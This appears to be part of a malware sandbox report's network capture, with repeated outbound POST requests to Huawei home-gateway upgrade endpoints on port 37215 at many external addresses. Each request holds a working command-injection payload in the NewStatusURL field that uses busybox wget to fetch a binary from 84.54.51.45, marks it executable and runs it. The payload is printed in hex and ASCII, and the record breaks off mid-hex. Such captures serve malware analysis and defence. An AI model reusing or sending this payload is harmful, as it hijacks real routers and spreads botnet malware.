                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2330192.168.2.154380841.28.146.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806112051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2331192.168.2.154403041.194.26.13337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806138992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2332192.168.2.155791041.168.43.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806164026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2333192.168.2.155306841.178.47.3137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806190968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2334192.168.2.153741041.65.157.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806251049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2335192.168.2.153782241.170.52.22137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806281090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2336192.168.2.154020241.251.220.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806304932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2337192.168.2.154752041.86.89.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806339979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2338192.168.2.153466441.78.219.22837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806369066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2339192.168.2.154442441.117.125.20137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806454897 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 